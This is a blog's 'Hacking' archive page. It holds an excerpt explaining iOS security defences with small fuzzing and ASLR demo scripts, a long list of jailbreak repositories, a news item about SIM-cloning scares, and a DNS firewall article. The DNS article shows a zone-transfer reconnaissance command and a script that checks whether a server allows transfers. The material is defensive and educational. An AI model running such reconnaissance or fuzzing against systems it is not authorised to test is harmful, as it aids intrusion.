266 posts in the 'Hacking' category

  1. 2012.08.08 Understanding the iOS Security Architecture by CEOinIRVINE
  2. 2012.08.05 Cydia Repositories by CEOinIRVINE 7
  3. 2012.07.04 SIM Card Cloning by CEOinIRVINE 1
  4. 2012.06.15 DNS Vuln. by CEOinIRVINE 1
  5. 2012.06.01 Employers on track to get more nosey with employees' social media lives by CEOinIRVINE 1
  6. 2012.01.28 How to Keep Your AWS Credentials on an EC2 Instance Securely by CEOinIRVINE
  7. 2011.12.10 HttpOnly by CEOinIRVINE
  8. 2011.12.05 Security Advisory by CEOinIRVINE 1
  9. 2011.12.04 Web Penetration Testings by CEOinIRVINE
  10. 2012.11.30 Blocked DOMAINS / IP address for spreading malicious files (Chat.EXE, Chat.DLL) by CEOinIRVINE

Understanding the iOS Security Architecture

You can imagine some of the nasty attacks that await an iOS device; this section discusses how the device is engineered to withstand these kinds of attacks. Here we describe iOS 5, which as you'll see, is pretty secure. In a later section we show you the evolution of how iOS got here, which was a bit of a bumpy ride.

The Reduced Attack Surface

The attack surface is the code that processes attacker-supplied input. If there is a vulnerability in some code but the attacker can't reach it, or if Apple doesn't ship that code in iOS at all, an attacker cannot base an exploit on that vulnerability. Therefore, a key practice is minimizing the amount of code an attacker can access, especially remotely.

Where possible, Apple reduced the attack surface of iOS compared to Mac OS X (or other smartphones). For example, love it or hate it, Java and Flash are unavailable on iOS. These two technologies have a long history of security vulnerabilities, and not including them makes it harder for an attacker to find a flaw to leverage. Likewise, iOS will not process certain files that Mac OS X will. One example is .psd files. This file type is handled happily by Safari, but not by MobileSafari, and importantly, hardly anybody would notice the lack of support for this obscure file format. Likewise, one of Apple's own formats, .mov, is only partially supported, and many .mov files that play on Mac OS X won't play on iOS. Finally, even though iOS renders .pdf files natively, only some features of the file format are parsed. Just to put some numbers on the subject, Charlie Miller once fuzzed Preview (the native Mac OS X PDF viewer) and found well over a hundred crashes. When he tried the same files against iOS, only 7 percent of them caused a problem. In other words, just by reducing the PDF features it handles, iOS cut the number of potential vulnerabilities by more than 90 percent in this case. Fewer flaws mean fewer opportunities for exploitation.
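
The kind of dumb mutation fuzzing described above is easy to reproduce. The following is a minimal Python sketch, a generic illustration rather than Miller's actual harness; the seed file name is a placeholder:

import os
import random

def mutate(data, flips=16):
    """Return a copy of data with a few randomly chosen bytes corrupted."""
    buf = bytearray(data)
    for _ in range(flips):
        buf[random.randrange(len(buf))] = random.randrange(256)
    return bytes(buf)

# Start from any valid seed file (here, a placeholder PDF).
with open("sample.pdf", "rb") as f:
    seed = f.read()

os.makedirs("cases", exist_ok=True)
for i in range(100):
    with open("cases/case%03d.pdf" % i, "wb") as f:
        f.write(mutate(seed))

# Each file in cases/ would then be opened in the target viewer under a
# crash monitor; inputs that crash the parser point at potential bugs.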

The Stripped-Down iOS

Beyond just reducing the potential code an attacker might exploit, Apple also stripped down the number of useful binaries an attacker might want to use during and after exploitation. The most obvious example is that there is no shell (/bin/sh) on an iOS device. In Mac OS X exploits, the main goal of the payload (the "shellcode") is typically to execute a shell. Because there is no shell at all in iOS, some other end goal must be devised for iOS exploits. But even if there were a shell in iOS, it wouldn't be useful, because an attacker would not be able to execute other utilities from it, such as rm, ls, ps, and so on. Therefore, attackers who get code running must either perform all of their actions within the context of the exploited process or bring along all the tools they want to use. Neither of these options is particularly easy to pull off.

Privilege Separation

iOS separates processes using users, groups, and other traditional UNIX file permission mechanisms. For example, many of the applications to which the user has direct access, such as the web browser, mail client, or third-party apps, run as the user mobile. The most important system processes run as the privileged user root. Other system processes run as other users such as _wireless or _mdnsresponder. By using this model, an attacker who gets full control of a process such as the web browser will be constrained by the fact that the code she is executing will be running as user mobile. There are limits to what such an exploit can do; for example, the exploit will not be able to make system-level configuration changes. Likewise, apps from the App Store are limited in what they can do because they will be executed as user mobile as well.
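
The same constraint is easy to observe on any UNIX-like system. The sketch below is a generic POSIX demonstration (not iOS-specific code) of an unprivileged process being refused a system-level change, which is exactly the position an exploit running as mobile is in:

import os

print("running as uid", os.getuid())
try:
    # An unprivileged account (analogous to iOS's 'mobile' user) cannot
    # write system configuration; only root can.
    with open("/etc/privsep-demo", "w") as f:
        f.write("test")
    print("write succeeded -- you are probably running as root")
except PermissionError as exc:
    print("denied, as expected for an unprivileged user:", exc)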

Code Signing

One of the most important security mechanisms in iOS is code signing. All binaries and libraries must be signed by a trusted authority (such as Apple) before the kernel will allow them to be executed. Furthermore, only pages in memory that come from signed sources will be executed. This means apps cannot change their behavior dynamically or upgrade themselves. Together, these actions prevent users from downloading and executing random files from the Internet. All apps must come from the Apple App Store (unless the device is configured to accept other sources). Apple has the ultimate approval and inspects applications before they can be hosted at the App Store. In this way, Apple plays the role of an antivirus for iOS devices. It inspects each app and determines if it is okay to run on iOS devices. This protection makes it very hard to get infected with malware. In fact, only a few instances of malware have ever been found for iOS.

The other impact of code signing is that it complicates exploitation. Once an exploit is executing code in memory, it might want to download, install, and execute additional malicious applications. This will be denied because anything it tries to install will not be signed. Therefore, exploits are restricted to the process they originally compromise, unless they go on to attack other features of the device.

This code signing protection is, of course, the reason people jailbreak their phones. Once jailbroken, unsigned applications can be executed on the device. Jailbreaking also turns off other features (more on that later).

Data Execution Prevention

Normally, data execution prevention (DEP) is a mechanism whereby a processor can distinguish which portions of memory are executable code and which portions are data; DEP will not allow the execution of data, only code. This is important because when an exploit is trying to run a payload, it would like to inject the payload into the process and execute it. DEP makes this impossible because the payload is recognized as data and not code. The way attackers normally try to bypass DEP is to use return-oriented programming (ROP), which is discussed in Chapter 8. ROP is a technique in which the attacker reuses existing valid code snippets, typically in a way never intended by the process, to carry out the desired actions.

The code-signing mechanism in iOS acts like DEP but is even stronger. Typical attacks against DEP-enabled systems use ROP briefly to create a section of memory that is writable and executable (and hence where DEP is not enforced). Then they can write their payload there and execute it. However, code signing requires that no page may be executed unless it originates from code signed by a trusted authority. Therefore, when performing ROP in iOS, it is not possible to turn off DEP the way an attacker normally would. Combined with the fact that an exploit cannot launch applications it may have written to disk, this means an exploit must perform all of its work in ROP; it cannot execute any other kind of payload, such as shellcode or additional binaries. Writing large payloads in ROP is very time-consuming and complex. This makes exploitation of iOS more difficult than just about any other platform.

Address Space Layout Randomization

As discussed in the previous section, the way attackers try to bypass DEP is to reuse existing code snippets (ROP). However, to do this, they need to know where the code segments they want to reuse are located. Address space layout randomization (ASLR) makes this difficult by randomizing the location of objects in memory. In iOS, the locations of the binary, libraries, dynamic linker, stack, and heap are all randomized. When a system has both DEP and ASLR, there is no generic way to write an exploit for it. In practice, this usually means an attacker needs two vulnerabilities, one to obtain code execution and one to leak a memory address in order to perform ROP, or the attacker may be able to get by with one very special vulnerability.
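
You can observe ASLR at work on an ordinary Linux desktop with a few lines of code. This is a generic demonstration of the concept, not an iOS tool: run it twice, and with ASLR enabled the C library lands at a different address each run, which is precisely the information an attacker building a ROP chain is missing.

import ctypes
import ctypes.util

# Load the C library and report where one of its functions ended up.
libc = ctypes.CDLL(ctypes.util.find_library("c"))
addr = ctypes.cast(libc.printf, ctypes.c_void_p).value
print("printf loaded at", hex(addr))
# With ASLR enabled, consecutive runs print different addresses.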

Sandboxing

The final piece of the iOS defense is sandboxing. Sandboxing allows even finer-grained control over the actions that processes can perform than the UNIX permission system mentioned earlier. For example, both the SMS application and the web browser run as user mobile, but perform very different actions. The SMS application probably doesn't need access to your web browser cookies and the web browser doesn't need access to your text messages. Third-party apps from the App Store shouldn't have access to either of these things. Sandboxing solves this problem by allowing Apple to specify exactly what permissions are necessary for apps. (See Chapter 5 for more details.)

Sandboxing has two effects. First, it limits the damage malware can do to the device. If you imagine a piece of malware being able to get through the App Store review process and being downloaded and executed on a device, the app will still be limited by the sandbox rules. It may be able to steal all your photos and your address book, but it won't be able to send text messages or make phone calls, which might directly cost you money. Sandboxing also makes exploitation harder. If an attacker finds a vulnerability in the reduced attack surface, manages to get code executing despite the ASLR and DEP, and writes a productive payload entirely in ROP, the payload will still be confined to what is accessible within the sandbox. Together, all of these protections make malware and exploitation difficult, although not impossible.

 




Cydia Repositories

Hacking 2012. 8. 5. 03:50

Welcome to iJailbreak's Cydia Repositories section. In this section you will find the best Cydia repositories/sources and the best Installer 4.0/3.0 repositories/sources compatible with the iPhone, iPod Touch and iPad. Simply scroll through our Cydia Repositories section and find a variety of sources you never knew about. Additionally, if you know of a great Cydia repository that is not on our list, let us know and we will add it.

Note #1: We will be updating this page with the latest Cydia and Installer repositories when new repositories are released, so make sure you come back soon!



How To: Manually Delete Broken Sources From Cydia
How To: Install Icy Installer On iPhone, iPod Touch, iPad [iOS4 Compatible]
The Ultimate Tutorial For Creating A Cydia Repository [Covering Everything A-Z]
Rock App Vs Cydia: Which Of These Two Installers Are Truly Better?
SaurikIT Acquires Rock Your Phone Inc

FilippoBiga Repo • http://filippobiga.me/repo/
Ryan Petrich • http://reptri.ch/repo (This repository contains beta software and is for testing purposes only!)
BigBoss & Planet-iPhones • http://apt.bigboss.us.com/repofiles/cydia/
ZodTTD • http://www.zodttd.com/repo/cydia/
iJailbreak.com • http://www.ijailbreak.com/repository/
Zodttd & MacCiti • http://cydia.zodttd.com/repo/cydia/ (Themes, emulators, ringtones and more)
Hackulo.us • http://cydia.hackulo.us
xSellize • http://cydia.xsellize.com
SiNfuL iPhone • http://www.sinfuliphonerepo.com
Epelle6 • http://elpelle6.com/repo
Hack&Dev.org • http://iphone.hackndev.org/apt/
SaladSoft • http://nickplee.com/cydiasource/
Ste Packaging • http://repo.smxy.org/cydia/apt/
Steffwiz • http://apt.steffwiz.com/
Telesphoreo Tangelo • http://apt.saurik.com/
iClarified • http://cydia.iclarified.com/
iSpazio • http://ispaziorepo.com/cydia/apt
Free Coder • http://iphone.freecoder.org/apt/
Intelliborn • http://intelliborn.com/cydiav/
iPhone Video Recorder • http://www.iphonevideorecorder.com
iFon Norway • http://c.iFon1.no
ModMyiFone • http://apt.modmyi.com/
Weiphone Source • http://app.weiphone.com/cydia/
urbanfanatics.com • http://urbanfanatics.com/cydia/
WeHo • http://weho.ru/iphone/
iAcces • http://www.iacces.com/apt/
Vwallpapers • http://i.danstaface.net/deb/
iphone.org.hk • http://www.iphone.org.hk/apt/
XSellize • http://xsellize.com/cydia/
XSellize VIP • http://xsellize.com/cydia/usuario-password
Niklas Schroder • http://apt.paperclipsandscrambledeggs.com
lHackers.nl • http://apt.hackers.nl/
RichCreations • http://www.richcreations.com/iphone/apt/
Zuijlen • http://zuijlen.eu
Bloc Apple en Catalá • http://apple.blocks.cat/repo/
comcute & gecko • http://gecko.pri.ee/cydia/
iFoneguide.nl • http://cydia.ifoneguide.nl/
iPhones-notes.de Repo • http://apt.iphone-storage.de/
iPhone-patch • http://mspasov.com/
iphonehe.com • http://iphonehe.com/iphone/
iphoneIslam • http://apps.iphoneislam.com/
iPhonemmod.br • http://cydia.iphonemod.com.br/
iPuhelin.com • http://ipuhelin.com/cydia/
i-Apps • http://cydia.i-apps.pl/
SOS iPhone • http://cy.sosiphone.com/
Macbury • http://macbury.jogger.pl/files/
MyApple • http://cydia.myapple.pl/
CZ & SK • http://csid.tym.cz/repo/
yellowsn0w • http://apt9.yellowsn0w.com/
IngiliZanahtari • http://apt.ingilizanahtari.com/
iPhone-patch (Bulgarian) • http://mc2.iphoneall.org/
4PP13 Team Repository • http://apt.123locker.com
iPhone.ir Repo • http://ir-iphone.ir/cydia/
iRom gba/Apps • http://iromrepo.com/Cydia/gba/
iRom Genesis Roms • http://iromrepo.com/Cydia/genesis/
iRom SNES Roms • http://iromrepo.com/Cydia/snes
Howett • http://howett.net/cydia
Clubiphone • http://www.clubifone.org/repo
iBlueToothProject • http://ibluetoothproject.com/cydia
iSoftRu • http://isoftru.ru/repo/
David Ashman • http://david.ashman.com/apt/
A-steroids • http://a-esteroids.com/cydia/
AppleNewsFR • http://apple-news.fr/repo/
TouchMania • http://cydia.touch-mania.com/
EasyWakeup • http://easywakeup.net/rep/
hkvls.dyndns.com • http://hkvls.dyndns.com/downloads/debian
Sleepers • http://repo.sleepers.com/cydia
Ranbee • http://ranbee.com/repo/
PwnCenter • http://apt.pwncenter.com/
Redwolfberry • http://redwolfberry.com/rupertgee/cydia/
Darvens Repository • http://apt.guardiansofchaos.com/

Installer 4.0 Repositories (The New Cydia Alternative – Installer 4.0! [Back From The Dead])

RiP Dev • http://i.ripdev.com/
SOS iPhone French Repository • http://i.sosiphone.com/
Ste Packaging • http://repo.smxy.org/installer4/
ZeFiR’s rep • http://www.zefir.kiev.ua/repo/
JASON-HK.COM___2.0 • http://www.jason-hk.com/rep/
Srt10coupe’s repository • http://i.srt10coupe.de/
A27 Dev • http://www.a27dev.com/installer/repo
AboutTheiPhone • http://www.makkiaweb.net/openrepo/abouttheiphone/
Apdyg • http://www.apdyg.com/repo/
BigBoss’s Apps and Things • http://www.apptapp.thebigboss.org/repofiles/installer4/
BigBoss’s Apps and Things • http://www.iphonebigboss5.com/repo/repof…nstaller4/
Chamber Labs Repsitory • http://www.chamber.ee/repo/
Code Genocide Repo • http://repo.codegenocide.com/
Danimator’s Repo • http://www.danimator.techdocrx.com/Repository/
DelphiKnight’s Repository • http://www.iphone.appstore.ge/
Elite Members Repo • http://www.teamifortner.com/installer/
Fishbone’s Repo • http://www.fishbone.site90.com/
HDNL Repository • http://www.hackers.nl/repo4/
HHVN – iPhone • http://iphone.handheld.com.vn/installer/
Hiphonepro.com Repo • http://www.hiphonerepo.com/repo/
Intelliborn • http://www.intelliborn.com/repo/
LoQueBARTnoEscribe • http://www.multifiesta.com.uy/i/
iRom Apps/GBA • http://www.iromrepo.com/Repo/GBA/
iRom GENESIS • http://www.iromrepo.com/Repo/GENESIS/
iRom SNES • http://www.iromrepo.com/Repo/SNES/
iSpazio • installer.ispazio.net/
iSpazio • http://repo.neolinus.org/ispazio/
iXtension • http://www.ixtension.com/repo/
navco786 • http://www.navco786.com/repo/
M2 Local Repo • http://m2.iphoneall.org/
MacOS Movil • http://www.repo.macosmovil.com/
MacOS Movil • http://www.bealze.com/repo/
ModElit3ge • http://www.elit3ge.info/repo/
ModMyiFone.com • http://i.modmyi.com/
ModMyiFone • http://www.modmyi.com/i/
ModMyiFone • http://www.modmyiphone.com/i/
ModMyiFone • http://www.modmyifone.com/i/
Moroko VoIP Repo • http://mobile.moroko.ru/iphone/
Ocho Repo • http://www.nextphasesolutions.com/iphone/
gPDA.ru • http://www.gpda.ru/r/
hackint0sh.org installer repo • http://hackint0sh.org/repo/
i4repo.com • http://www.i4repo.com/
iAcces Community • http://www.iacces.com/repo4/
iClaified • http://www.iclarified.com/installer4/
iFon Norway • http://www.ifon1.no/installer4/instructions.php (http://i.ifon1.no)
iFoneTec Repository • http://app.mivtones.com
iFoneTec Repository • http://repo.ifonetec.com/
iFoneTec(VIP) Repository • http://vip.mivtones.com/
iFoneguide • http://www.ifoneguide.nl/repo/
iModZone Repo • http://imodzone.extroverthost.com/repo/
iModZone Repo • http://i.imodzone.net/
iPhone-notes.de • http://i.iphone-storage.de/
iPhoneBlog.co.il Repository • http://rep.hacxip.com/

Installer 3.0 Repositories

BigBoss’s Apps and Things • sleepers.net/iphonerepo
iSpazio • http://repo.ispazio.net
ModMyiFone.com • modmyifone.com/installer.xml
RiP Dev (Kate, formerly Caterpillar) • http://repository.ripdev.com/
Ste Packaging • http://repo.smxy.org/iphone-apps/
CopyCoders • homepage.mac.com/hartsteins/copycoders/copycoders.xml
dajavax • dajavax.googlepages.com/repo.xml
aka.Repository • akamatsu.org/repo.xml
AlliPodHax Source • ihacks.us/index.xml or allipodhax.3host.biz/index.xml
Skrew • i.danstaface.net
Slezak’s Stuff • http://www.spencerslezak.com
Smart-Mobil • http://www.smart-mobile.com/beta
Soneso Repository • soneso.com/iphone
SOS iPhone (ContactFlow) • rep.sosiphone.com
Spiffyware • spiffyware.net/iphone
Studded • studded.net/installer/index.xml
Surge • iphonesurge.com/iphonesurge.xml
Swell • lyndellwiggins.com/installer/Swell
Swirlyspace • swirlyspace.com/SwirlySpace.xml
AlohaSoft 1.0.2 • homepage.mac.com/reinholdpenner/102.xml
AlohaSoft 1.1.1 • homepage.mac.com/reinholdpenner/111.xml
AlohaSoft 1.1.2 • homepage.mac.com/reinholdpenner/112.xml
Apple • applerepo.com
Apple Daily Times • http://www.appledailytimes.com/installer
AppTapp • repository.apptapp.com
Apogee LTD • apogeeltd.com
Blaze • blazecompany.googlepages.com/
BigBoss Beta • sleepers.net/iphonerepobeta
BlackWolf • m8an.de/ownrisk.xml (Extended Preferences)
Byooi Digicide • byooi.com/iphone/digicide.plist (Jiggy Apps)
CedSoft (iSnake/Bounce) • prog.cedsoft.free.fr
Chris Miles Repository (iSolitare) • iphone.rustyredwagon.com/repo
Conceited Software Beta • http://conceitedsoftware.com/iphone/beta/
Conceited Software • http://www.macminicolo.net/conceited/iphone/cache.plist
databinge • repo.databinge.com
DavTeam • davteam.com/repo.xml
Death to Design • iphone.deathtodesign.com
Digital Agua • repo.digitalagua.com
Dlubbat’s Apps • http://www.dlubbat.com/iphone.xml
Ettore Software Ltd • ettoresoftware.com/iphone/beta/ty.iphone
Fight Club • dezign999.com/repo
FreeMyiPhone • pxl.freemyiphone.com/
Fring • fring.com/iphone.xml
Gogosoft Source • http://www.blackblack.org/gogobeta.plist
GravyTrain ’s Vault • iiispace.com/installer2.xml (Includes user submitted themes)
Hijinks Inc. • hijinksinc.com/i/installer.xml
hitoriblog Experimental Pack • hpcgi3.nifty.com/moyashi/ipodtouch/repository.cgi
HighTymes • hightymes.org/iphone/plist/index.xml
iApp-a-Day • iappaday.com/install
Imagine09 • home.twcny.rr.com/imagine09/Imagine09.xml
iBlackjack • iphonefanclub.com/native
iClarified • installer.iclarified.com
iFoneTech • app.ifonetec.com
Intelliborn • intelliborn.com/repo
iPhone Cake • iphonecake.com/src/all
iPhoneDevDocs • idevdocs.com/install
iPhone For Taiwan (SummberBoard Themes) • iphone4.tw/showme
iPhoneFreakz • iphonefreakz.com/repo.xml
iPhoneIslam • apps.iphoneislam.com
iPlayful • iplayful.com/r
i.Marine Software (Caissa) • caissa.us
imimux Repository (Real Artist) • imimux.com
iPod Touch Fans • http://www.touchrepo.com/repo.xml
iPod Touched • ipodtouched.net/repo.xml
iPod-Touch-Themes.de • http://www.ipod-touch-themes.de/installer/repo.xml
iSwitcher (old) • web.mac.com/iswitcher2/list.xml
iSwitcher (new) = MeachWare • meachware.com/list.xml
Jeremie Engel • rep.visuaweb.com
Jiggy Main Repository (Jiggy) • jiggyapp.com/i
lazyasada • lazyasada.xeterdesign.com/repo.xml
Limited Edition iPhone • limitededitioniphone.com/lei.xml
Loring Studios • loringstudios.com/iPhone-schnapps/index.xml
McAfeeMobile Dev Repository • ipkg.mcafeemobile.com
MarcoGiorgini.com • marcogiorgini.com/iPhone/plist.xml
Makayama Software (CameraPro) • tinyurl.com/2t8cax
MaomaLand • maomaland.com/iphone/repo.xml
Mateo (BeatPhone) • bblk.net/iphone
McCarron’s Repo • patrickmccarron.com/irepo
MeachWare (new iSwitcher) • http://www.meachware.com/list.xml
Mkv iPhone Repository • repo.mkv.mobi
Mobile Stacks • mobilestack.googlecode.com/svn/repository/internal.plist
ModMyApple.it (iBirthday) • http://www.serverasp.net/chiafa/MMA/repo.xml
Moyashi • hpcgi3.nifty.com/moyashi/ipodtouch/repository.cgi
MTL Repository • home.mike.tl/iphone
MyApple.pl • i.myapple.pl
newATTiPhone.com  • newattiphone.com/repo.xml
NPike.net • http://apps.npike.net/repo.xml
Nuclear Design  • nucleardesign.net/repository
Planet-iPhones • planet-iphones.com/repository
Polar Bear Farm • http://www.polarbearfarm.com/repo/
Polleo Limited • source.polleo.no
Private Indisture • brandonsgames.com/chriss/index.xml
Pyrofer’s Projects • pyrofersprojects.com/repos/repos.xml
R4m0n (iPhysics) • iphone.r4m0n.net/repos
Robota Softwarehouse • iphone.robota.nl
Sanoodi Repository • sanoodi.com/iphone
ScoresPro • http://www.scorespro.com/iphone/repo.xml
scummVM • urbanfanatics.com/scummvm.xml
sendowski.de (MobileChat) • sendowski.de/iphone
Shai’s Apps • ride4.org/shai.xml
Simek’s Graphic • simek.ddl2.pl
sipgate repository • iphone.sipgate.com
Touchmod Team • touchmods.net/rep.xml
Trejan • trejan.com/irepo
Trivialware • mazinger.cs.yale.edu/iphone-apps/index.xml
Unlock.no • i.unlock.no
weiPhone (weTools/weDict) • app.weiphone.com/installer
Wiki2Touch • 168weedon.com/i/
Wizdom on Wheels (Common Website Links) • iphoneapps.wizdomonwheels.com
XK72 Repository • http://xk72.com/iphone/repos/
ZodTTD • zodttd.com/repo


 


SIM Card Cloning

Hacking 2012. 7. 4. 13:23

LUCKNOW: Next time if you get a missed call starting with +92; #90 or #09, don't show the courtesy of calling back. BSNL has issued alerts to subscribers — particularly about the series mentioned above — saying that calling the number back after a missed call may make a user susceptible to SIM card cloning. There is, however, confusion over this claim made by some BSNL and intelligence officials. Cloning a SIM card requires physical access to it or the interception of the communication between the caller and his or her cellphone operator's network.

It is said that one lakh subscribers have fallen prey to this scam. Intelligence agencies, too, are said to have confirmed to the service providers, particularly in the UP West telecom division, that such a racket is going on and that the menace is growing fast. "We are sure there must be some more similar combinations that the miscreants are using to clone the handsets, including SIM, and all the information stored in them," an intelligence officer told TOI. (This claim by the intelligence official seems implausible, if not impossible.)

General manager of BSNL, RV Verma, said the department had already issued alerts to all the broadband subscribers and now alerts were being SMSed to other subscribers as well.

Anyone can clone a SIM card by using a hardware tool that can read and copy information from it. But wirelessly or remotely intercepting information contained within the SIM, though theoretically possible, is considered extremely difficult. It may require hacking into the telecom operator's network or using very expensive tools. An article on eHow, a website that explains how users can perform various tasks with various gadgets, says that a SIM can be cloned using a cheap hardware tool that extracts the authentication key from one SIM and copies it to another. But it doesn't mention any method that can make use of missed calls to clone a SIM.

"It usually starts with a missed call from a number starting with +92. In case the subscriber takes the call before it is dropped as a missed call then the caller on the other end poses as a call center executive checking the connectivity. The caller then asks the subscriber to press # 09 or # 90 call back on his number to establish that the connectivity to the subscriber was seamless," says a victim who reported the matter to the BSNL office at Moradabad last week. "The moment I redialled the caller number, my account balance lost a sum of money. Thereafter, in the three days that followed every time I got my cell phone recharged, the balance would be reduced to single digits within the next few minutes," she told the BSNL officials.


DNS Vuln.

Hacking 2012. 6. 15. 01:53

Allow Both TCP and UDP Port 53 to Your DNS Servers

DNS queries are getting bigger so we do not want to accidentally block them

By Scott Hogg on Sun, 08/22/10 - 7:44pm.

Security practitioners have for decades advised people to limit DNS queries against their DNS servers to UDP port 53 only. The reality is that DNS queries can also use TCP port 53 if UDP port 53 is not accepted. Now, with the impending deployment of DNSSEC and the eventual addition of IPv6, we will need to configure our firewalls to forward both TCP and UDP port 53 packets.

DNS can be used by attackers as one of their reconnaissance techniques. Public information contained on a target's servers is valuable to an attacker and helps them focus their attacks. Attackers can use a variety of techniques to retrieve DNS information through queries. However, hackers often try to perform a zone transfer from your authoritative DNS servers to gain access to even more information. You can use the dig command to gather information from a server for a specific zone file.
dig @192.168.11.24 example.org -t AXFR

Zone transfers take place over TCP port 53, and in order to prevent our DNS servers from divulging critical information to attackers, TCP port 53 is typically blocked. If the organization's firewall protecting the authoritative DNS server allowed the TCP port 53 packets and the DNS server was configured to allow zone transfers to anyone, then this dig command would be successful. However, most organizations have configured their DNS servers to prevent zone transfers to unintended DNS servers. This can be configured in the BIND zone file using any one of these forms of the allow-transfer statement, as shown below.
allow-transfer {"none";};
allow-transfer { address_match_list };
allow-transfer {192.168.11.11;};

Furthermore, most organizations have also used firewalls to block TCP port 53 to and from their DNS servers and the Internet. This is double-protection in case the DNS server accidentally allowed transfers.
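
If you would rather verify your servers from a script than with dig, a check along the following lines will tell you whether a zone transfer is being allowed. This is a sketch using the third-party dnspython library (an assumption on my part; any DNS library with AXFR support would do), and the server address and zone name are the same placeholders as above:

# Requires the dnspython package.
import dns.query
import dns.zone

try:
    # Attempt a zone transfer (AXFR) against our own authoritative server.
    zone = dns.zone.from_xfr(dns.query.xfr("192.168.11.24", "example.org"))
    print("AXFR succeeded and served %d names -- lock this down!"
          % len(zone.nodes))
except Exception as exc:
    print("AXFR refused (good):", exc)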

Configuring your DNS servers to permit zone transfers to only legitimate DNS servers has always been and continues to be a best practice. However, the practice of denying TCP port 53 to and from DNS servers is starting to cause some problems. There are two good reasons that we would want to allow both TCP and UDP port 53 connections to our DNS servers. One is DNSSEC and the second is IPv6.

DNSSEC Creates Larger DNS Responses
I love reading The IP Journal and have read it since the first issue in 1998.

In the recent edition of the IP Journal there was an article by a friend of mine, Stephan Lagerholm, of Secure64 and the Texas IPv6 Task Force, titled "Operational Challenges When Implementing DNSSEC". This article covered many of the caveats that organizations run into as they move to deploy DNSSEC.
One of the key issues mentioned is that DNSSEC can cause DNS replies to be larger than 512 bytes. DNSSEC (defined in RFC 4033, RFC 4034, and RFC 4035) requires the ability to transmit larger DNS messages because of the extra key information contained in the query responses. TCP port 53 can be used in cases where a DNS response is greater than 512 bytes. However, UDP is preferable to TCP for large DNS messages, because TCP connections consume computing resources for each connection; DNS servers handle numerous queries per second, and using TCP can add too much overhead. To address this issue, IETF RFC 2671, "Extension Mechanisms for DNS (EDNS0)", defines a method to extend the UDP buffer size to 4096 bytes to allow for DNSSEC and larger query responses. To enable EDNS0 in your BIND 9 configuration, you can use the following options statement:
edns-udp-size 4096 ;
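
To see the difference EDNS0 makes, the sketch below sends the same DNSSEC query twice, once plain and once advertising a 4096-byte UDP buffer, and prints the size of each reply. It uses the third-party dnspython library (an assumption on my part; the resolver address and zone are placeholders):

# Requires the dnspython package.
import dns.flags
import dns.message
import dns.query

server = "8.8.8.8"   # any recursive resolver; substitute your own
name = "org."        # a signed zone, so answers carry DNSSEC records

# Plain query: no EDNS0, so the reply must fit in 512 bytes or be truncated.
q_plain = dns.message.make_query(name, "DNSKEY")
r_plain = dns.query.udp(q_plain, server)

# EDNS0 query advertising a 4096-byte buffer and requesting DNSSEC data.
q_edns = dns.message.make_query(name, "DNSKEY", use_edns=0,
                                payload=4096, want_dnssec=True)
r_edns = dns.query.udp(q_edns, server)

print("plain reply:", len(r_plain.to_wire()), "bytes, truncated:",
      bool(r_plain.flags & dns.flags.TC))
print("EDNS0 reply:", len(r_edns.to_wire()), "bytes")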

Awareness of DNSSEC has increased due to the vulnerabilities disclosed two years ago and with recent news about the U.S. government striving to implement it. Many organizations have been planning their DNSSEC deployments. DNSSEC is becoming more widely deployed now that key Top Level Domains (TLDs) are being signed. The TLD .org has now been signed. The Internet's root zone was signed just two months ago in a ceremony in Virginia. VeriSign has stated its desire to support DNSSEC for .com and .net by 2011. Comcast has created a DNSSEC Information Center site that can help you keep up to date on the latest DNSSEC status.

So as the world transitions to DNSSEC, your organization may not necessarily be using it for your own authoritative DNS servers. However, your name servers may be requesting DNSSEC information even though they are not configured to serve up DNSSEC records. You may encounter problems if your resolvers start to receive DNSSEC information but are only able to accept UDP packets of 512 bytes or smaller. If your firewall is blocking TCP port 53 DNS messages or UDP port 53 messages using EDNS0, then you may encounter problems even if you haven't deployed DNSSEC yourself.

IPv6 DNS Lookups May be Larger Than 512 Bytes
We all know that IPv6 addresses are four times larger than IPv4 addresses. A standard A-record query response easily fits within the 512-byte UDP limit, and so does a standard AAAA-record query response, which is about 100 bytes. However, it is conceivable that with CNAMEs, glue records, and other data accompanying a DNS response, the reply could exceed the 512-byte UDP limit. Therefore, allowing TCP port 53 or enabling EDNS0 is also a requirement for IPv6 communications. This is also the case if you are doing DNS queries for IPv6 names and addresses while using the IPv4 protocol to communicate with the DNS servers.

One advantage of using IPv6 is that the vast majority of systems will use aggregatable global unicast addresses, so there will be no need for NAT. DNSSEC has never been compatible with NAT, so IPv6 offers an opportunity to use DNSSEC as it was intended to be used. One of the transition mechanisms originally developed was Network Address Translation - Protocol Translation (NAT-PT) (RFC 2766). This technique offered a rudimentary method to translate IPv4 and IPv6 packets between IPv4-only hosts and IPv6-only hosts. However, there were many reasons why NAT-PT was deprecated (RFC 4966) in the summer of 2007, one of which was the fact that it broke the usage of DNSSEC.

Firewalls
If a UDP port 53 response is larger than 512 bytes, it may be truncated, and DNS then falls back to using TCP. However, if TCP is blocked on the firewall, the lookup can fail altogether. Your firewall may also be preventing you from using EDNS0. Therefore, you should configure your firewall to allow both TCP and UDP port 53 to and from your DNS servers, as well as allow your firewall to pass larger EDNS0 packets. To accomplish this change you will have to modify your firewall's configuration parameters to enable EDNS0.

Cisco publishes a nice guide on DNS best practices that includes how to secure your DNS server configurations as well as allow for DNSSEC communications.

If you have a Cisco PIX firewall (6.3 and earlier) you may need to add this command to your configuration.
fixup protocol dns maximum-length 4096
This command will increase the firewall's DNS message length limit and allow EDNS0 messages to be forwarded.

If you have a newer software version running on your PIX or ASA then the traffic policy commands will look like this.
policy-map type inspect dns preset_dns_map
parameters
dns-guard
id-randomization
message-length maximum 4096
id-mismatch count 10 duration 2 action log
exit
match header-flag RD
drop
policy-map global_policy
class inspection_default
inspect dns preset_dns_map
service-policy global_policy global

In order to increase the response length you need to enter these commands:
policy-map global_policy
class inspection_default
inspect dns maximum-length 4096

To view the settings use the following command:
show service-policy inspect dns

Juniper ScreenOS also allows for the increase in DNS message size using the following command.
set di service dns udp_message_limit 512 - 4096

If your firewall doesn't have a visible setting to enable EDNS0 then you may want to check with the firewall manufacturer to see if it can even support this setting. If you are concerned about how your home router/firewall may fare with the introduction of DNSSEC you can check out the test results from Nominet and Core Competence.

Testing
Once you have permitted TCP and UDP port 53 and believe that your systems are EDNS0-capable, you must test that everything is working as expected. There are several methods you can use to test your configuration and validate whether your systems are capable of handling larger DNS packets.
Domain Name System Operations Analysis and Research Center (OARC) provides tools for testing your reply size limits.

They offer a Validating Resolver.
You can use the dig utility to test your configuration.
